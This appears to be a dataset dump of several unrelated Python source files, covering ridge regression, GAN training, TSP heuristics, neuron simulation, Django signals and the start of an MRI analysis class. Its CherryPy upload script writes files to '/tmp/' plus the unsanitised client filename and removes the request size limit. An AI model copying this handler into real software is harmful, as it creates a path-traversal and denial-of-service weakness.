if test is rows 10-20\n #combine rows 0-10 and rows 21-97\n data_train = np.vstack((X[0:j*10,:],X[min(j*10+10,97):,:]))\n data_test = np.copy( X[j*10:min(j*10+10,97),:] )\n\n #split into test and train data\n y_train = data_train[:,-1]\n X_train = data_train[:,0:-1]\n\n y_test = data_test[:,-1]\n X_test = data_test[:,0:-1]\n\n #standardize data for current fold\n y_mean = np.mean(y_train)\n X_mean = np.mean(X_train, axis=0)\n X_sd = np.std(X_train, axis=0)\n \n y_train -= y_mean\n X_train -= X_mean\n X_train /= X_sd\n \n y_test -= y_mean\n X_test -= X_mean\n X_test /= X_sd\n \n #get theta\n theta = ridge( X_train, y_train, d2[i])\n\n #prediction\n y_hat = np.dot( X_test, theta )\n\n #take note of errors\n ten_errors[j] = np.sum( ( y_hat - y_test )**2 )\n\n #end of fold loop \n\n #calculate degree of freedom\n df = 0 \n for u in xrange(8):\n df += S[u] / ( S[u] + d2[i])\n\n #take note of mean of ten errors, SD of ten errors and the current\n #degree of freedom\n mean_sd.append( [np.mean(ten_errors, axis=0), np.std(ten_errors, axis=0), df])\n\n #end of delta loop\n\n#from a list convert to array\nmean_sd = np.array( mean_sd )\n\n#plot error bar\npl.errorbar(mean_sd.T[2], mean_sd.T[0], mean_sd.T[1])\npl.show()\n","sub_path":"Python/Other/Projects/assign5-2ii.py","file_name":"assign5-2ii.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439224931","text":"'''\n Date: 12 Jun 2018\n Author: Guilherme Varela\n\n\n Invokes deep_srlbr scrips from command line arguments\n\n Usage:\n > python srl.py -help \n Shows docs\n\n > python srl.py 16 16 16 16\n Estimates the DBLSTM model with the following defaults:\n * embeddings: glove of size 50.\n * predicate context: previous and posterior word from the verb features.\n * learning rate: 5 * 1e-3\n * batch size: 250\n * target: T column\n\n'''\n\nimport argparse\n\nfrom models import estimate, estimate_kfold\nfrom models import PropbankEncoder\n\nFEATURE_LABELS = ['ID', 'FORM', 'MARKER', 'GPOS',\n 'FORM_CTX_P-1', 'FORM_CTX_P+0', 'FORM_CTX_P+1']\n\n\nif __name__ == '__main__':\n #Parse descriptors\n parser = argparse.ArgumentParser(\n description='''This script uses tensorflow for multiclass classification of Semantic Roles using \n Propbank Br built according to the Propbank guidelines. Uses Conll 2005 Shared Task pearl evaluator\n under the hood.''')\n\n parser.add_argument('depth', type=int, nargs='+', default=[16] * 4,\n help='''Set of integers corresponding\n the deep layer sizes. default: 16 16 16 16\\n''')\n\n parser.add_argument('-embeddings', dest='embeddings', nargs=1,\n default='glo50', choices=['glo50', 'wan50', 'wrd50'],\n help='''Embedding abbrev.\n and size examples: glo50, wan50. 
Default: glo50 \\n''')\n\n parser.add_argument('-ctx_p', dest='ctx_p', type=int, nargs=1,\n default=1, choices=[1, 2, 3],\n help='''Size of sliding window around predicate.\n Default: 1\\n''')\n\n parser.add_argument('-lr', dest='lr', type=float, nargs=1,\n default=5 * 1e-3,\n help='''Learning rate of the model.\n Default: 0.005\\n''')\n\n parser.add_argument('-batch_size', dest='batch_size', type=int, nargs=1,\n default=250,\n help='''Batch size.\n Default: 250 \\n''')\n\n parser.add_argument('-epochs', dest='epochs', type=int, nargs=1,\n default=1000,\n help='''Number of times to repeat training set during training.\n Default: 1000\\n''')\n\n parser.add_argument('-target', dest='target', nargs=1,\n default='T', choices=['T', 'IOB', 'HEAD'],\n help='''Target representations.\n Default: `T`\\n''')\n\n parser.add_argument('-kfold', action='store_true',\n help='''if present performs kfold\n optimization with 25 folds.\n Default: False''')\n\n parser.add_argument('-version', type=str, dest='version',\n nargs=1, choices=('1.0', '1.1',), default='1.0',\n help='PropBankBr: version 1.0 or 1.1')\n\n args = parser.parse_args()\n\n input_labels = FEATURE_LABELS\n # print(args)\n if isinstance(args.ctx_p, list) and args.ctx_p[0] > 1:\n input_labels.append('FORM_CTX_P-2')\n input_labels.append('FORM_CTX_P+2')\n if args.ctx_p[0] == 3:\n input_labels.append('FORM_CTX_P-3')\n input_labels.append('FORM_CTX_P+3')\n\n target_label = args.target\n embeddings = args.embeddings[0] if isinstance(args.embeddings, list) else args.embeddings\n learning_rate = args.lr[0] if isinstance(args.lr, list) else args.lr\n version = args.version[0] if isinstance(args.version, list) else args.version\n\n if args.kfold:\n # print(input_labels)\n # print(args.target)\n # print(args.depth)\n # print(embeddings)\n # print(args.epochs)\n # print(learning_rate)\n # print(args.batch_size)\n\n estimate_kfold(input_labels=input_labels, target_label=args.target,\n hidden_layers=args.depth, embeddings=embeddings,\n epochs=args.epochs, lr=learning_rate, fold=25,\n version=version)\n else:\n # print(input_labels)\n # print(args.target)\n # print(args.depth)\n # print(embeddings)\n # print(args.epochs)\n # print(learning_rate)\n # print(args.batch_size)\n # print(args.ctx_p)\n\n estimate(input_labels=input_labels, target_label=args.target,\n hidden_layers=args.depth, embeddings=embeddings,\n epochs=args.epochs, lr=learning_rate,\n batch_size=args.batch_size, version=version)\n","sub_path":"srl.py","file_name":"srl.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"182677563","text":"import logging\n\nfrom .additional_info_base_class import AdditionalInfoBaseClass\nfrom core.types.steroids_file.steroids_pandas_file.steroids_pandas_csv_file import SteroidsPandasCsvFile\n\nlogger = logging.getLogger(__name__)\n\n\nclass AdditionalInfoDefault(AdditionalInfoBaseClass):\n\n def __init__(self, cartera_activa, sql_service, source_file):\n \"\"\"\n Args:\n source_file (str): Ubicación del archivo csv\n cartera_activa (ActiveWalletReport): Cartera Activa\n sql_service (SqlService): Servicio de sql en core.services.sql_service\n \"\"\"\n self.source_file = source_file\n self.cartera_activa = cartera_activa\n self.sql_service = sql_service\n\n def to_sql(self):\n try:\n self.sql_service.data_frame_to_sql(\n data_frame=SteroidsPandasCsvFile(source_file=self.source_file,\n delimiter=\";\", quotechar='\"',\n index_col=None, decimal=\",\").read(),\n 
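# destination table and overwrite mode for the load; 'replace' drops and recreates the table on each run (assuming pandas-style to_sql semantics inside sql_service)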
table_name=self.get_table_name(),\n if_exists='replace'\n )\n except Exception as e:\n logger.exception(e)\n\n def to_cartera_activa(self):\n self.sql_service.database_engine.execute(self.service_query)\n\n def get_table_name(self):\n return f\"{self.__class__.__name__.lower()}\"\n\n def get_cartera_activa_name(self):\n return f\"cartera_activa_{self.cartera_activa.id}\"\n","sub_path":"core/services/additional_info/additional_info_default.py","file_name":"additional_info_default.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"421292965","text":"import os\nimport logging\nfrom math import log10\n\nimport torch\nimport torch.nn as nn\nfrom pytorch_msssim import SSIM, MS_SSIM\nimport torchvision\nfrom torch import optim\nfrom torch.utils.data import DataLoader, random_split\n\nfrom data_load_torch import DatasetLoader\nfrom network import Generator, Discriminator\nfrom loss_torch import GANLoss\n\ninput_dir = \"../data/gabor_hologram/\"\nlabel_dir = \"../data/phase/\"\nsave_path = \"result/\"\nimage_size = 1024\nval_percent = 0.1\nbatch_size = 10\nepochs = 1000\nlr = 0.001\nsave_cp = True\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nbeta1 = 0.5\nbeta2 = 0.999\nlambda_As = 100.0\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3, 4\"\n\n\ndef denorm(x):\n out = (x + 1) / 2\n return out.clamp(0, 1)\n\n\ndef train():\n print(\"data loading\")\n dataset = DatasetLoader(input_dir, label_dir, image_size)\n n_val = int(len(dataset) * val_percent)\n n_train = len(dataset) - n_val\n train, val = random_split(dataset, [n_train, n_val])\n\n train_loader = DataLoader(\n train, batch_size=batch_size, shuffle=True, num_workers=8, pin_memory=True\n )\n val_loader = DataLoader(\n val,\n batch_size=batch_size,\n shuffle=False,\n num_workers=8,\n pin_memory=True,\n drop_last=True,\n )\n\n logging.info(\n f\"\"\"Starting training:\n Epochs: {epochs}\n Batch size: {batch_size}\n Learning rate: {lr}\n Training size: {n_train}\n Validation size: {n_val}\n Checkpoints: {save_cp}\n Device: {device.type}\n Images scaling: {image_size}\n \"\"\"\n )\n\n # Networks\n generator = Generator()\n discriminator = Discriminator()\n\n checkpoint = torch.load(\"./checkpoint/model_epoch_250.pth\")\n\n generator = nn.DataParallel(generator).to(device=device)\n discriminator = nn.DataParallel(discriminator).to(device=device)\n\n generator.load_state_dict(checkpoint[\"g_state_dict\"])\n discriminator.load_state_dict(checkpoint[\"d_state_dict\"])\n\n # Losses\n criterionGAN = GANLoss().to(device)\n\n criterionL1 = nn.L1Loss().to(device)\n\n criterionMSE = nn.MSELoss().to(device)\n\n ssim_module = SSIM(data_range=1.0, size_average=True, channel=1).to(device)\n # ms_ssim_module = MS_SSIM(data_range=1, size_average=True, channel=1).to(device)\n\n # Optimizers\n g_optimizer = optim.Adam(generator.parameters(), lr, [beta1, beta2])\n d_optimizer = optim.Adam(discriminator.parameters(), lr, [beta1, beta2])\n\n g_optimizer.load_state_dict(checkpoint[\"g_optimizer_dict\"])\n d_optimizer.load_state_dict(checkpoint[\"d_optimizer_dict\"])\n\n for epoch in range(epochs):\n train_epoch = epoch + 250\n print(\"epoch: \", train_epoch)\n\n for sample in train_loader:\n input_image = sample[\"input_image\"].to(device=device)\n label_image = sample[\"label_image\"].to(device=device)\n\n # discriminator\n d_optimizer.zero_grad()\n\n fake_image = generator(input_image)\n\n pred_fake = discriminator(input_image, 
fake_image)\n loss_D_fake = criterionGAN(pred_fake, False)\n\n pred_real = discriminator(input_image, label_image)\n loss_D_real = criterionGAN(pred_real, True)\n\n loss_D = (loss_D_fake + loss_D_real) * 0.5\n\n loss_D.backward()\n d_optimizer.step()\n\n # generator\n g_optimizer.zero_grad()\n\n fake_image = generator(input_image)\n\n pred_real = discriminator(input_image, fake_image)\n loss_G_gan = criterionGAN(pred_real, True)\n\n ssim_loss = 1 - ssim_module(fake_image, label_image)\n\n loss_G_l1 = criterionL1(fake_image, label_image) * lambda_As\n\n # generator loss\n loss_G = loss_G_gan + loss_G_l1 + ssim_loss * lambda_As\n\n loss_G.backward()\n g_optimizer.step()\n\n avg_psnr = 0\n\n num = 0\n\n if train_epoch % 50 == 0:\n for sample in val_loader:\n input_image = sample[\"input_image\"].to(device=device)\n label_image = sample[\"label_image\"].to(device=device)\n\n fake_image = generator(input_image)\n mse = criterionMSE(fake_image, label_image)\n psnr = 10 * log10(1 / mse.item())\n avg_psnr += psnr\n\n print(\"===> Avg. PSNR: {:.4f} dB\".format(avg_psnr / len(val_loader)))\n\n if num < 2:\n torchvision.utils.save_image(\n denorm(fake_image),\n os.path.join(\n save_path,\n \"Fake image-%d-%d.tif\" % (train_epoch + 1, num + 1),\n ),\n )\n if epoch == 0:\n torchvision.utils.save_image(\n denorm(input_image),\n os.path.join(\n save_path,\n \"Input image-%d-%d.tif\" % (train_epoch + 1, num + 1),\n ),\n )\n torchvision.utils.save_image(\n denorm(label_image),\n os.path.join(\n save_path,\n \"Label image-%d-%d.tif\" % (train_epoch + 1, num + 1),\n ),\n )\n num += 1\n\n if not os.path.exists(\"checkpoint\"):\n os.mkdir(\"checkpoint\")\n model_out_path = \"checkpoint/model_epoch_{}.pth\".format(train_epoch)\n\n torch.save(\n {\n \"g_state_dict\": generator.state_dict(),\n \"d_state_dict\": discriminator.state_dict(),\n \"g_optimizer_dict\": g_optimizer.state_dict(),\n \"d_optimizer_dict\": d_optimizer.state_dict(),\n },\n model_out_path,\n )\n\n print(\"Checkpoint saved to {}\".format(\"checkpoint\"))\n\n\nif __name__ == \"__main__\":\n train()\n","sub_path":"pix2pix/train_torch.py","file_name":"train_torch.py","file_ext":"py","file_size_in_byte":6146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263465902","text":"import networkx as nx\n\n\ndef is_fully_connected(G):\n \"\"\"\n returns true if the graph G is (a) undirected (b) is fully connected.\n \"\"\"\n N = G.number_of_nodes()\n E = G.number_of_edges()\n if isinstance(G,nx.Graph) and 2*E == N*(N-1):\n return True\n else:\n return False\n\ndef drop_repeated(input_list):\n \"\"\"\n return a list omitting the repeated elements of input_list while maintaining the order of\n elements in the list.\n \"\"\"\n output_list = []\n for entry in input_list:\n if entry in output_list:\n pass\n else:\n output_list.append(entry)\n return output_list\n\ndef tsp_solution_to_path(G,tsp_route,all_pairs_shortest_paths):\n \"\"\"\n converts the given tsp sequence to be followed by the car into a\n path in the graph G\n Input:\n G - undirected weighted input graph\n tsp_route - list of vertices specifying the route to be followed by the car\n all_pairs_shortest_paths - dict such that all_pairs_shortest_paths[u][v] is the shortest\n path from u to v\n \"\"\"\n prev = tsp_route[0]\n final_path = []\n final_path.append(prev)\n for vertex in tsp_route[1:]:\n # path = nx.shortest_path(G,prev,vertex,weight='weight')\n path = all_pairs_shortest_paths[prev][vertex]\n final_path += path[1:]\n prev = vertex\n 
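# final_path now holds tsp_route with every leg expanded into real graph hops;\n # e.g. a (hypothetical) route ['a', 'b', 'a'] may expand to ['a', 'c', 'b', 'c', 'a']\n # when 'c' lies on both shortest paths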
return final_path\n\n#################################################################################\n# TSP approximation algorithm via minimum spanning trees\ndef metric_mst_tsp(G,s):\n \"\"\"\n Approximate TSP algorithm. Approximation factor = 2.0\n Returns a list of vertices of G representing an approximate Traveling Salesman Problem cycle\n starting and ending at the source s. Uses an MST approximation.\n Inputs:\n G -- a fully connected undirected weighted graph where edge weights satisfy triangle inequality.\n s -- a vertex in G\n \"\"\"\n T = nx.minimum_spanning_tree(G,weight='weight')\n dfs_edges = list(nx.dfs_edges(T,source=s))\n vertices = []\n for e in dfs_edges:\n vertices.append(e[0])\n vertices.append(e[1])\n tsp_path = drop_repeated(vertices)\n tsp_path.append(s)\n\n return tsp_path\n#################################################################################\n\n\n#################################################################################\n# Routines for Christofides TSP approximation algorithm\ndef find_max_weight(G):\n \"\"\"\n return the weight of the heaviest edge in G\n \"\"\"\n max_weight = 0\n for edge in G.edges:\n u,v = edge[0],edge[1]\n if G[u][v]['weight'] > max_weight:\n max_weight = G[u][v]['weight']\n return max_weight\n\ndef transform_graph_for_max_matching(G):\n \"\"\"\n returns a graph with modified edge weights such that a maximal matching on the\n modified graph corresponds to a minimal matching on G\n \"\"\"\n max_weight = find_max_weight(G)\n modified_graph = nx.Graph()\n for edge in G.edges:\n u,v = edge[0],edge[1]\n wt = G[u][v]['weight']\n modified_graph.add_edge(u,v,weight=max_weight-wt)\n return modified_graph\n\ndef min_weight_matching(G):\n \"\"\"\n Returns a set of edges representing a minimum weight matching.\n Every node appears only once in a matching.\n \"\"\"\n modified_graph = transform_graph_for_max_matching(G)\n min_matching = nx.max_weight_matching(modified_graph, maxcardinality = True)\n return min_matching\n\ndef find_odd_degree_nodes(G):\n \"\"\"\n returns a list of vertices which have odd degree in graph G.\n \"\"\"\n degree = G.degree()\n odd_nodes = []\n for v in G.nodes:\n if degree[v] % 2 == 0:\n pass\n else:\n odd_nodes.append(v)\n return odd_nodes\n\ndef construct_fully_connected_subgraph(node_subset,G):\n \"\"\"\n return a graph with `node_subset` as the nodes.\n The graph is fully connected and uses the same edge weight as in G.\n Inputs:\n G - a fully connected graph with edge weights\n node_subset - List with a subset of nodes to be used in the new graph\n \"\"\"\n sub_graph = nx.Graph()\n for u in node_subset:\n for v in node_subset:\n if u == v:\n pass\n else:\n wt = G[u][v]['weight']\n sub_graph.add_edge(u,v,weight=wt)\n return sub_graph\n\ndef complete_shortest_path_subgraph(G, subset):\n \"\"\"\n return a fully connected graph using the vertices in `subset`\n and whose edges are weighted by the shortest path between these\n vertices in the graph `G`\n \"\"\"\n new_graph = nx.Graph()\n distances = dict(nx.all_pairs_dijkstra_path_length(G))\n for I in range(len(subset)-1):\n u = subset[I]\n for J in range(I+1,len(subset)):\n v = subset[J]\n dist = distances[u][v]\n new_graph.add_edge(u,v,weight=dist)\n return new_graph\n\ndef complete_shortest_path_subgraph_efficient(graph,subset,distances):\n \"\"\"\n return a fully connected graph using the vertices in `subset`\n and whose edges are weighted by the shortest path between these\n vertices in the graph `G`\n Inputs:\n graph - input graph\n subset - list of 
vertices to be used for the subgraph\n distances - dictionary such that distances[v1][v2] is the length of shortest path from\n v1 to v2\n \"\"\"\n new_graph = nx.Graph()\n for I in range(len(subset)):\n u = subset[I]\n for J in range(I,len(subset)):\n v = subset[J]\n dist = distances[u][v]\n new_graph.add_edge(u,v,weight=dist)\n return new_graph\n\ndef add_specified_edges(G1,G2,edges):\n \"\"\"\n copy G2[edges] into G1\n \"\"\"\n for edge in edges:\n u,v = edge[0],edge[1]\n wt = G2[u][v]['weight']\n G1.add_edge(u,v,weight=wt)\n\ndef construct_eulerian_multigraph(G1,G2,edges):\n \"\"\"\n Construct a multigraph M:\n (1) copy G1 into M\n (2) copy specified edges of G2 into M\n \"\"\"\n eulerian_multigraph = nx.MultiGraph()\n add_specified_edges(eulerian_multigraph,G1,G1.edges)\n add_specified_edges(eulerian_multigraph,G2,edges)\n return eulerian_multigraph\n\ndef metric_christofides_tsp(G,s):\n \"\"\"\n return a list of vertices of G representing an approximate Traveling Salesman Problem cycle\n starting and ending at s. Uses the Christofides approximation.\n G -- a fully connected undirected weighted graph where edge weights satisfy triangle inequality.\n s -- a vertex in G\n \"\"\"\n if G.number_of_nodes() == 1:\n return [s]\n else:\n tree = nx.minimum_spanning_tree(G)\n odd_nodes = find_odd_degree_nodes(tree)\n sub_graph = construct_fully_connected_subgraph(odd_nodes,G)\n min_matching_edges = min_weight_matching(sub_graph)\n eulerian_graph = construct_eulerian_multigraph(tree,G,min_matching_edges)\n circuit = nx.eulerian_circuit(eulerian_graph,s)\n vertices = []\n for edge in circuit:\n vertices.append(edge[0])\n vertices.append(edge[1])\n christofides_tsp = drop_repeated(vertices)\n christofides_tsp.append(s)\n return christofides_tsp\n","sub_path":"tsp_routines.py","file_name":"tsp_routines.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581490375","text":"# Simmulating 2 neurons connected by synapse\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport random\nimport math\n\n# Parameters to be used for the integrate and fire equation\ndeltaT = 1 #timestep [ms]\ntotalTime = 1000 #taking time in [ms]\nE_L = -70 #resting voltage [mV]\nV_reset = -80.0 #reset voltage [mV]\nV_Th = -54.0 # Threshold voltage [mV]\nRm = 10 #membrane resistance [Mohm]\ntau = 20; # time constant [ms]\n\nR_mG_s = 0.15 #[mV]\nR_mI_e = 18.0 #[mV]\nP_max = 0.5 \nt_s = 10.0 # [ms]\nT_f = 0; # when did the presynaptic neuron last fire?\n\n\n# Asumming synapses are excitatory\nE_s = 0.0 #[mV]\n\n\nn = int(totalTime / deltaT)\n\n#initial vector to hold value\ntime = np.linspace(0,totalTime, n+1) #will hold vector of times\nVoltagePreSynaptic = np.zeros(len(time)) #initialize the VoltagePreSynaptic vector.\nVoltagePostSynaptic = np.zeros(len(time)) #initialize the VoltagePreSynaptic vector.\n\ni = 0; #index denoting which element of V is being assigned\nVoltagePreSynaptic[i]= random.uniform(V_reset, V_Th) #value of V at t=0\nVoltagePostSynaptic[i]= random.uniform(V_reset, V_Th)\n\n# P_s = P_max * e(-1 * ((V - T_f)/ t_s)\n# V(t) = ((- V + E_L + (Rm*I_e) - ((P_s * Rm * Gs) * (V - E_s)) ) / tau) * deltaT\nfor index in range(totalTime):\n\n P_sa = P_max * math.exp(-1 * ((index - T_f) / t_s)) * (index - T_f)\n dV_a = ((E_L - VoltagePreSynaptic[index] - ((P_sa * R_mG_s) * (VoltagePreSynaptic[index] - E_s)) + (R_mI_e)) / tau) * deltaT\n VoltagePreSynaptic[index + 1] = VoltagePreSynaptic[index] + dV_a\n\n 
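# spike-and-reset: crossing V_Th counts as a spike, so the membrane is clamped back to V_reset below.\n # Note: with the T_f = index update left commented out, T_f stays 0 and the synaptic pulse P_s\n # remains a single alpha function anchored at t = 0 instead of tracking presynaptic spikes.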
if(VoltagePreSynaptic[index + 1] > V_Th):\n VoltagePreSynaptic[index + 1] = V_reset\n # T_f = index\n\n P_sb = P_max * math.exp(-1 * ((index - T_f) / t_s)) * (index - T_f)\n dV_b = ((E_L - VoltagePostSynaptic[index] - ((P_sb * R_mG_s) * (VoltagePostSynaptic[index] - E_s)) + (R_mI_e)) / tau) * deltaT\n VoltagePostSynaptic[index + 1] = VoltagePostSynaptic[index] + dV_b\n\n if(VoltagePostSynaptic[index + 1] > V_Th):\n VoltagePostSynaptic[index + 1] = V_reset\n # T_f = index\n\np1, = plt.plot(time,VoltagePreSynaptic, 'b')\np2, = plt.plot(time,VoltagePostSynaptic, 'r')\nplt.xlabel(\"Time in ms\")\nplt.ylabel(\"Voltage in mV\")\nplt.title(\"Excitatory Synapse with Equilibrium Potential 0.0\")\nplt.legend([p2, p1], [\"Neuron A\", \"Neuron B\"])\nplt.show()\n\n","sub_path":"Assignment 1/Question7a.py","file_name":"Question7a.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601716714","text":"#uplaod.py\nimport cherrypy\nimport cgi\nimport tempfile\nimport os\n\n\n__author__ = \"Ex Vito\"\n\n\n\n\nclass myFieldStorage(cgi.FieldStorage):\n \"\"\"Our version uses a named temporary file instead of the default\n non-named file; keeping it visibile (named), allows us to create a\n 2nd link after the upload is done, thus avoiding the overhead of\n making a copy to the destination filename.\"\"\"\n \n def make_file(self, binary=None):\n return tempfile.NamedTemporaryFile()\n\n\ndef noBodyProcess():\n \"\"\"Sets cherrypy.request.process_request_body = False, giving\n us direct control of the file upload destination. By default\n cherrypy loads it to memory, we are directing it to disk.\"\"\"\n cherrypy.request.process_request_body = False\n\ncherrypy.tools.noBodyProcess = cherrypy.Tool('before_request_body', noBodyProcess)\n\n\nclass fileUpload:\n \"\"\"fileUpload cherrypy application\"\"\"\n \n @cherrypy.expose\n def index(self):\n \"\"\"Simplest possible HTML file upload form. Note that the encoding\n type must be multipart/form-data.\"\"\"\n \n return \"\"\"\n \n \n
<form action=\"upload\" method=\"post\" enctype=\"multipart/form-data\">\n File: <input type=\"file\" name=\"image\"/> <br/>
\n <input type=\"submit\"/>\n </form>
\n \n \n \"\"\"\n \n @cherrypy.expose\n @cherrypy.tools.noBodyProcess()\n def upload(self, image=None):\n \"\"\"upload action\n \n We use our variation of cgi.FieldStorage to parse the MIME\n encoded HTML form data containing the file.\"\"\"\n \n # the file transfer can take a long time; by default cherrypy\n # limits responses to 300s; we increase it to 1h\n cherrypy.response.timeout = 3600\n \n # convert the header keys to lower case\n lcHDRS = {}\n for key, val in cherrypy.request.headers.iteritems():\n lcHDRS[key.lower()] = val\n \n # at this point we could limit the upload on content-length...\n # incomingBytes = int(lcHDRS['content-length'])\n \n # create our version of cgi.FieldStorage to parse the MIME encoded\n # form data where the file is contained\n formFields = myFieldStorage(fp=cherrypy.request.rfile,\n headers=lcHDRS,\n environ={'REQUEST_METHOD':'POST'},\n keep_blank_values=True)\n \n # we now create a 2nd link to the file, using the submitted\n # filename; if we renamed, there would be a failure because\n # the NamedTemporaryFile, used by our version of cgi.FieldStorage,\n # explicitly deletes the original filename\n image = formFields['image']\n os.link(image.file.name, '/tmp/'+image.filename)\n \n return \"ok, got it filename='%s'\" % image.filename\n\n\n# remove any limit on the request body size; cherrypy's default is 100MB\n# (maybe we should just increase it ?)\ncherrypy.server.max_request_body_size = 0\n\n# increase server socket timeout to 60s; we are more tolerant of bad\n# quality client-server connections (cherrypy's defult is 10s)\ncherrypy.server.socket_timeout = 60\n\ncherrypy.quickstart(fileUpload())","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103722831","text":"from django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.db.models.signals import post_save\nfrom django.dispatch import Signal, receiver\n\nfrom common.pusher import Pusher\n\npost_bulk_update = Signal(providing_args=['updated_ids'])\n\n\ndef get_users_for_notification(model, ids):\n User = get_user_model()\n users_ids = model.objects.filter(\n id__in=ids,\n ).values_list(f'{model.related_subscription_path}{User._meta.model_name}', flat=True)\n users = User.objects.filter(id__in=users_ids)\n return users\n\n\n@receiver(post_save)\ndef on_single_changes(sender, instance, **kwargs):\n from university.models import Subscription, Timetable, Class, Lecturer, ClassTime\n\n models = [Subscription, Timetable, Class, Lecturer, ClassTime]\n if sender in models:\n ids = [instance.id]\n users = get_users_for_notification(sender, ids)\n message_title = 'updating' if instance.state == sender.ACTIVE else 'deleting'\n transaction.on_commit(lambda: Pusher().send_notification(sender, users, ids, message_title))\n\n# @receiver(post_bulk_update)\n# def on_bulk_changes(sender, updated_ids, **kwargs):\n# users = get_users_for_notification(sender, updated_ids)\n# transaction.on_commit(lambda: Pusher().send_notification(sender, users, updated_ids))\n","sub_path":"university/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"634185885","text":"def is_palindrom(n):\n a = str(n)\n b = a[::-1]\n if a == b :\n return True\n return False\n\ndef solver():\n palindrom = []\n for i in range(100,999+1):\n for j in 
range(100,999+1):\n if is_palindrom(i*j):\n palindrom.append(i*j)\n return palindrom\n\nif __name__ == '__main__':\n hasil = max(solver())\n print(\"Jawaban : {hasil}\".format(hasil=hasil))","sub_path":"archives/4-largest-palindrome-product/largest-palindrome-product.py","file_name":"largest-palindrome-product.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"522644391","text":"from logging import getLogger\nfrom nipype.interfaces.utility import Merge\nfrom nipype.interfaces.fsl import (\n TOPUP, ApplyTOPUP, BET, FUGUE, Merge as FslMerge)\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces.utility import Merge as merge_lists\nfrom nipype.interfaces.fsl.epi import PrepareFieldmap\nfrom nipype.interfaces.mrtrix3 import ResponseSD, Tractography\nfrom nipype.interfaces.mrtrix3.utils import BrainMask, TensorMetrics\nfrom nipype.interfaces.mrtrix3.reconst import FitTensor, EstimateFOD\nfrom banana.interfaces.custom.motion_correction import GenTopupConfigFiles\nfrom banana.interfaces.mrtrix import (\n DWIPreproc, MRCat, ExtractDWIorB0, MRMath, DWIBiasCorrect, DWIDenoise,\n MRCalc, DWIIntensityNorm, AverageResponse, DWI2Mask)\n# from nipype.workflows.dwi.fsl.tbss import create_tbss_all\n# from banana.interfaces.noddi import (\n# CreateROI, BatchNODDIFitting, SaveParamsAsNIfTI)\nfrom nipype.interfaces import fsl, mrtrix3, utility\nfrom arcana.utils.interfaces import MergeTuple, Chain\nfrom arcana.data import FilesetSpec, InputFilesetSpec\nfrom arcana.utils.interfaces import SelectSession\nfrom arcana.study import ParamSpec, SwitchSpec\nfrom arcana.exceptions import ArcanaMissingDataException, ArcanaNameError\nfrom banana.requirement import (\n fsl_req, mrtrix_req, ants_req)\nfrom banana.interfaces.mrtrix import MRConvert, ExtractFSLGradients\nfrom banana.study import StudyMetaClass\nfrom banana.interfaces.custom.motion_correction import (\n PrepareDWI, AffineMatrixGeneration)\nfrom banana.interfaces.custom.dwi import TransformGradients\nfrom banana.interfaces.utility import AppendPath\nfrom banana.study.base import Study\nfrom banana.bids_ import BidsInputs, BidsAssocInputs\nfrom banana.exceptions import BananaUsageError\nfrom banana.citation import (\n mrtrix_cite, fsl_cite, eddy_cite, topup_cite, distort_correct_cite,\n n4_cite, dwidenoise_cites)\nfrom banana.file_format import (\n mrtrix_image_format, nifti_gz_format, nifti_gz_x_format, fsl_bvecs_format,\n fsl_bvals_format, text_format, dicom_format, eddy_par_format,\n mrtrix_track_format, motion_mats_format, text_matrix_format,\n directory_format, csv_format, zip_format, STD_IMAGE_FORMATS)\nfrom .base import MriStudy\nfrom .epi import EpiSeriesStudy, EpiStudy\n\nlogger = getLogger('banana')\n\n\nclass DwiStudy(EpiSeriesStudy, metaclass=StudyMetaClass):\n\n desc = \"Diffusion-weighted MRI contrast\"\n\n add_data_specs = [\n InputFilesetSpec('anat_5tt', mrtrix_image_format,\n desc=(\"A co-registered segmentation image taken from \"\n \"freesurfer output and simplified into 5 tissue\"\n \" types. Used in ACT streamlines tractography\"),\n optional=True),\n InputFilesetSpec('anat_fs_recon_all', zip_format, optional=True,\n desc=(\"Co-registered freesurfer recon-all output. 
